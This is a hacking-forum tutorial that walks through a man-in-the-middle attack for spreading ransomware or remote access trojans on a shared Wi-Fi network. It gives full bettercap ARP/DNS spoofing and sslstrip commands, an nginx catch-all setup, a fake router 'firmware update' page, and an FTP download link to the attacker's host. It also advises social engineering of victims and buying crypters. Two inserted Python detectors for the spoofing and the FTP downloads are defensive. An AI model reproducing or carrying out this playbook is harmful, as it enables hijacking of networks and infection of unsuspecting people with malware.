Malware and Ransomware Delivery - MiTM Attack

Free Hacking Tutorials
ethical hacker
Posts: 169
Joined: Thu Feb 29, 2024 10:48 pm


Postby ethical hacker » Sat Jun 22, 2024 9:52 am

WARNING!
a) Use a freshly built Kali VM between tool runs so leftover state from one tool does not break the next.

b) This attack currently works inconsistently. Nothing here is 100% reliable, but the steps below give you the best chance.

c) Use a new Private window when testing against your target device, or clear the browser's cookies and saved data after connecting to your fake access point. The first run against a target behaves as expected; when re-testing, many people reuse the same browser and get worse results. Use a new Private window each time.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

INTRODUCTION
With this attack we intercept all web requests and redirect everyone on the same network as us to our web server. The goal is to hijack the internet connection of every host that shares the network with us. You can target a single host or the whole network.
The purpose is to force people onto our web server, where a prepared landing page delivers malware, ransomware or a phishing form.

Because we intercept all web requests, the malware itself is delivered over a different protocol so that people can still download it. The reasoning is that a victim requesting ransomware.exe over HTTP/HTTPS would keep getting the landing page instead of the file, so the payload is served over FTP. Note that the nginx catch-all configured below only substitutes the landing page for paths that do not exist under /var/www/html; a file that is actually placed there is served over HTTP as normal. This guide nevertheless links to the FTP server, and the remaining steps follow that choice.

Everyone on the network loses internet access: you showed up, joined the network, and their connection stopped working. That is the moment the attack is waiting for. As mentioned before, consider investing more in Wi-Fi hacking hardware, such as extra Alfa network cards and suitable antennas.

We intercept all browser requests so that every host on the network is redirected to our web server and enticed to download the malware. The example below is deliberately simple and should be adapted to your targets. As said, tailor these attacks to the people you are going after and social engineer them into downloading the file.

PREREQUISITES
- DoS the Wi-Fi router
- wifipumpkin3
- Your RAT, ransomware, malware, etc.
- Bettercap
(If you cannot get onto a network, a Denial of Service (DoS) attack can knock the router offline; wifipumpkin3 then stands up a rogue access point through which the malware is distributed.)

PROCESS GUIDE
Open a Terminal window within Kali:

cd /var/www/html

sudo gedit index.html

Paste the following HTML into the file, save it and exit. Replace "WiFi Router Name" and "XY" with the values you want.
<!DOCTYPE html>
<html>
<head>
<title>WiFi Router Name</title>
<style>
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
</style>
</head>
<body>
<center>
<div class="content">
<div class="title" id="msg_title"><b>WiFi Router Firmware Update Required</b></div>
<ul class="details">
<div id="main">
<div id="msg">
<li><b>Internet access has been blocked for safety.<br><br> Please download and install the new critical firmware for XY router:<br>
XY Router:</b> <span class="url"><a href="Update.exe"><b>Firmware Update</b></a></span></li>
</div>
</div>
</ul>
</div>
<div class="footer">XY Router <b>Firmware Update</b></div>
</center>
</body>
</html>


"Update.exe" stands for your chosen Remote Access Trojan, ransomware, etc.; place that file in the directory /var/www/html.

This is the most effective way I know of to redirect people to a phishing or malware delivery page. Before using it, be aware of its limitations: every browser, operating system and user behaves differently.

To maximise the chance of steering users to the phishing or malware delivery page, run the following commands in order.

Stop the Apache2 and Nginx services from a terminal, remove the default site, and create a new one:

sudo service apache2 stop

sudo service nginx stop

sudo rm /etc/nginx/sites-available/default

sudo rm /etc/nginx/sites-enabled/default

sudo gedit /etc/nginx/sites-available/default

Paste the following server block. It serves /var/www/html and, through error_page, answers every 404 and 5xx with index.html; the location = /index.html { internal; } block means that file is only reachable through an internal redirect (the index directive for /, or the error_page redirect, which a direct request for /index.html also ends up taking after its 404), so any path on any spoofed hostname lands on the landing page:
server {
listen 80 default_server;
root /var/www/html;
error_page 500 502 503 504 404 /index.html;
location = /index.html
{
internal;
}
server_tokens off;
index index.html index.php index.htm index.nginx-debian.html;
server_name _;
}

sudo ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/

sudo service nginx restart

For this example, assume the attacker machine has the IP address 192.168.2.100 and the target has 192.168.2.250.
Open a new terminal window in Kali:

sudo service apache2 stop

sudo service nginx restart

sudo bettercap

Enter all of the following commands at the bettercap prompt:

net.probe on

Wait about thirty seconds for the hosts on the network to be discovered and listed.

net.probe off

net.show

This lists the hosts on the network; note your target's IP address.

set arp.spoof.targets TARGET_IP

For this example: set arp.spoof.targets 192.168.2.250
To attack the whole network: set arp.spoof.targets *

set arp.spoof.fullduplex true

set arp.spoof.internal true

set https.proxy.sslstrip true

set dns.spoof.domains *

set dns.spoof.address ATTACKER_IP

For this example: set dns.spoof.address 192.168.2.100

set dns.spoof.all true

https.proxy on

arp.spoof on

dns.spoof on

Keep the bettercap window open and running.

This is an effective way to redirect people to a phishing or malware delivery page, but its limitations matter because operating systems and browsers behave differently. In general it breaks most HTTPS sites, and browsers then show certificate warnings. Plain HTTP requests are redirected to the attacker's page without any warning. Some browsers still try the HTTP version of a hostname typed into the address bar, which helps land the victim on the page; sites on the HSTS preload list are never requested over HTTP, so those never redirect.

Test the attack in several browsers so you know exactly what the victims will see.
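For the defending side, the bettercap session above leaves two signatures on the wire: one MAC answering ARP for several IP addresses (arp.spoof with fullduplex) and one LAN address answering DNS for every name (dns.spoof.domains *). The detector below finds both. It is an added example written for this page, not code from the original post or from bettercap; the ARP replies and DNS answers are constructed by hand around the addresses used above, and the gateway at 192.168.2.1 and all MAC addresses are assumptions.

```python
"""Detect the signatures left by the arp.spoof / dns.spoof session above.

Added example for this page, not code from the original post or from
bettercap. Input is a list of ARP replies and a list of DNS answers, as a
passive sniffer on the same LAN (tcpdump -n arp, or a resolver log) would
record them. All records below are constructed by hand using the
walkthrough's addresses; the gateway at 192.168.2.1 and every MAC address
are assumptions.
"""
import ipaddress
from collections import defaultdict

# Constructed ARP replies: (sender_ip, sender_mac). fullduplex spoofing makes
# the attacker's MAC answer for both the gateway and the victim, while the
# genuine MACs still appear in other replies.
ARP_REPLIES = [
    ("192.168.2.1",   "aa:aa:aa:aa:aa:01"),  # real gateway (assumed)
    ("192.168.2.250", "cc:cc:cc:cc:cc:50"),  # real victim
    ("192.168.2.100", "bb:bb:bb:bb:bb:00"),  # attacker, its own address
    ("192.168.2.1",   "BB:BB:BB:BB:BB:00"),  # attacker claiming the gateway
    ("192.168.2.250", "bb:bb:bb:bb:bb:00"),  # attacker claiming the victim
]

# Constructed DNS answers: (qname, answer_ip). dns.spoof.domains * answers
# every unrelated public name with the one attacker address.
DNS_ANSWERS = [
    ("www.example.com",    "192.168.2.100"),
    ("mail.example.net",   "192.168.2.100"),
    ("update.example.org", "192.168.2.100"),
    ("cdn.example.com.",   "192.168.2.100"),
    ("printer.lan",        "192.168.2.20"),   # one legitimate local answer
]


def detect_arp_spoof(replies):
    """Return (ip_conflicts, mac_multi_ip).

    ip_conflicts: {ip: [mac, ...]} for every IP claimed by more than one MAC.
    mac_multi_ip: {mac: [ip, ...]} for every MAC claiming more than one IP.
    A poisoner triggers both; an innocent NIC replacement triggers only the
    first, so the second is the stronger indicator.
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    for ip, mac in replies:
        mac = mac.lower()            # normalise case before comparing
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    ip_conflicts = {ip: sorted(m) for ip, m in ip_to_macs.items() if len(m) > 1}
    mac_multi_ip = {mac: sorted(i) for mac, i in mac_to_ips.items() if len(i) > 1}
    return ip_conflicts, mac_multi_ip


def detect_dns_wildcard(answers, min_names=3):
    """Return {answer_ip: [qname, ...]} for every private (RFC 1918 style)
    address that answers for min_names or more distinct names. Public
    hosting legitimately shares addresses, so only LAN addresses count."""
    by_ip = defaultdict(set)
    for qname, ip in answers:
        if ipaddress.ip_address(ip).is_private:
            by_ip[ip].add(qname.lower().rstrip("."))   # fold case, drop root dot
    return {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_names}


if __name__ == "__main__":
    conflicts, multi = detect_arp_spoof(ARP_REPLIES)
    for ip, macs in conflicts.items():
        print(f"ARP: {ip} claimed by {', '.join(macs)}")
    for mac, ips in multi.items():
        print(f"ARP: {mac} claims {', '.join(ips)}")
    for ip, names in detect_dns_wildcard(DNS_ANSWERS).items():
        print(f"DNS: {ip} answers for {len(names)} names: {', '.join(names)}")
```

On the constructed input this reports the gateway and the victim as each claimed by two MACs, the attacker's MAC as claiming three addresses, and 192.168.2.100 as the answer for four unrelated names. Against a real capture, feed it the (ip, mac) pairs from ARP replies over a window of a few minutes; the MAC-claims-many-IPs condition is the one to alert on, since fullduplex spoofing has to impersonate at least two hosts.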

To keep deliveries smooth later on, edit /var/www/html/index.html to point at the malware you are using.

In this example, if the ransomware is named SpiderX.exe, place it in /var/www/html, the web server directory. If you use a RAT instead, copy that file to the same directory and change index.html to reference the RAT executable's actual filename.

Next we go to /var/www/html and start an FTP server that shares that folder, and we change /var/www/html/index.html to reference the malware's executable name. With all web traffic on the network redirected to us, the target can download the malware over FTP.

To do this, open a new terminal window in Kali:

cd /var/www/html

python3 -m pyftpdlib -w

This starts an anonymous FTP server on port 2121. Keep the window open for the whole attack.

python3 -m pyftpdlib -w is the FTP counterpart of python3 -m http.server 80: a quick, zero-configuration server with no config files to maintain, and easy to script if you want. Note that -w grants the anonymous user write access to /var/www/html, which a download never needs; run it without -w and the share stays read-only, so nobody else on the network can upload into your web root.

Open another terminal window in Kali:

sudo gedit /var/www/html/index.html

Change "Update.exe" in the <a href="Update.exe"> line to "ftp://ATTACKER_IP:2121/YOUR_MALWARE_FILE.exe".

For this example:

ftp://192.168.2.100:2121/SPIDERX.exe


Save and close the '/var/www/html/index.html' file.

The attack setup is now complete. In future, start the FTP server before running Bettercap.

This technique breaks both HTTPS and HTTP sites the target tries to reach, ideally steering them to the attacker's web server, which links to the malware or ransomware for FTP download. Be aware that current versions of Chrome, Edge and Firefox no longer support ftp:// links at all (Chrome dropped FTP in version 88, Firefox in version 90), so on those browsers the link does nothing unless the victim pastes it into a dedicated FTP client or a file manager that still speaks FTP. Stealth is limited; for the best results, plan carefully and use solid social engineering to get people to download the files. The average user may not notice the hijack, but because FTP is plaintext the executable transfer is visible to anyone monitoring traffic, which matters far more on corporate networks. Choose targets carefully and proceed with caution; home networks and small businesses are unlikely to be monitoring traffic.
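The plaintext-FTP point above is easy to act on from the monitoring side. The detector below walks FTP control-channel commands as captured on the LAN and flags any RETR of an executable, ranking sessions that use an anonymous login, a server that is itself on the LAN, and a port other than 21, which together match the delivery pattern in this guide. It is an added example written for this page, not code from the original post or from pyftpdlib; the capture is constructed by hand around the walkthrough's addresses, and the second session, its username and the server address 1.2.3.4 are placeholders for ordinary FTP use.

```python
"""Flag plaintext FTP retrievals of executables, the traffic a monitoring
team would see when the delivery above runs.

Added example for this page, not code from the original post or from
pyftpdlib. Input is the FTP control channel as captured on the wire, one
(client_ip, server_ip, server_port, line) tuple per command. The capture
below is constructed by hand around the walkthrough's addresses; the
second session, its credentials and the address 1.2.3.4 are placeholders.
"""
import ipaddress
import re

# File extensions worth alerting on when fetched over an unencrypted channel.
EXEC_EXT = {".exe", ".dll", ".scr", ".msi", ".bat", ".cmd", ".ps1", ".hta", ".js"}

CAPTURE = [
    ("192.168.2.250", "192.168.2.100", 2121, "USER anonymous"),
    ("192.168.2.250", "192.168.2.100", 2121, "PASS guest@"),
    ("192.168.2.250", "192.168.2.100", 2121, "TYPE I"),
    ("192.168.2.250", "192.168.2.100", 2121, "PASV"),
    ("192.168.2.250", "192.168.2.100", 2121, "RETR SPIDERX.exe"),
    ("192.168.2.250", "192.168.2.100", 2121, "QUIT"),
    ("192.168.2.33",  "1.2.3.4",       21,   "USER build"),
    ("192.168.2.33",  "1.2.3.4",       21,   "PASS hunter2"),
    ("192.168.2.33",  "1.2.3.4",       21,   "RETR release-notes.txt"),
]

_CMD = re.compile(r"^([A-Za-z]+)(?:\s+(.*))?$")   # "VERB [argument]"


def ftp_executable_retrievals(capture):
    """Return one finding per RETR of an executable-looking file.

    Sessions are keyed by (client, server, port) so the USER seen earlier on
    the same control connection is attached to the download. Flags rank how
    closely the session matches the delivery pattern: an anonymous login, a
    server that is itself on the LAN, and a port other than 21.
    """
    users = {}
    findings = []
    for client, server, port, line in capture:
        m = _CMD.match(line.strip())
        if not m:
            continue
        cmd, arg = m.group(1).upper(), (m.group(2) or "").strip()
        key = (client, server, port)
        if cmd == "USER":
            users[key] = arg.lower()
        elif cmd == "RETR":
            name = arg.rsplit("/", 1)[-1]           # strip any directory part
            dot = name.rfind(".")
            ext = name[dot:].lower() if dot >= 0 else ""
            if ext not in EXEC_EXT:
                continue
            flags = ["executable"]
            if users.get(key) in ("anonymous", "ftp"):
                flags.append("anonymous")
            if ipaddress.ip_address(server).is_private:
                flags.append("lan-server")
            if port != 21:
                flags.append("nonstandard-port")
            findings.append({
                "client": client,
                "server": f"{server}:{port}",
                "user": users.get(key),
                "file": name,
                "flags": flags,
            })
    return findings


if __name__ == "__main__":
    for f in ftp_executable_retrievals(CAPTURE):
        print(f"{f['client']} -> {f['server']} user={f['user']} "
              f"RETR {f['file']} [{', '.join(f['flags'])}]")
```

On the constructed capture only the first session is reported, with all four flags set; the build server session fetches a text file and is ignored. Because the control channel is plaintext, the same lines are what a tap, a span port or an IDS on the victim's segment would see, which is the exposure the paragraph above warns about.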

CONCLUSION
Success depends on how creative and convincing the redirect page is. If it looks crude and amateurish, people get suspicious. On a small business or corporate network, adding the company's logo and a message urging a system upgrade (for example, offering a VPN client for encrypted access) adds credibility. The page must look professional to be believable; watch spelling and grammar, and make the redirect page match what the victim would expect to see from a trusted source.

Many people will refuse to download "Malware.exe", and browsers may block known malicious files outright. How far you get depends on what malware you have: whether you bought a crypter, the quality of the ransomware and how it performs. Building a reliable toolkit is hard but essential; keep learning and keep improving your tools.

Adapt your tactics to the changing landscape and do not rely solely on .exe files for malware, since AV detection, code-signing checks and similar hurdles keep getting stricter.

Man-in-the-middle phishing against HSTS-enabled sites is unlikely to succeed. HTTPS traffic can be intercepted, but victims will see warnings they have to click through, so the effective use of this attack is to get them to the place where your malware or ransomware is hosted. Moving victims onto the host where your files live is the best course of action.
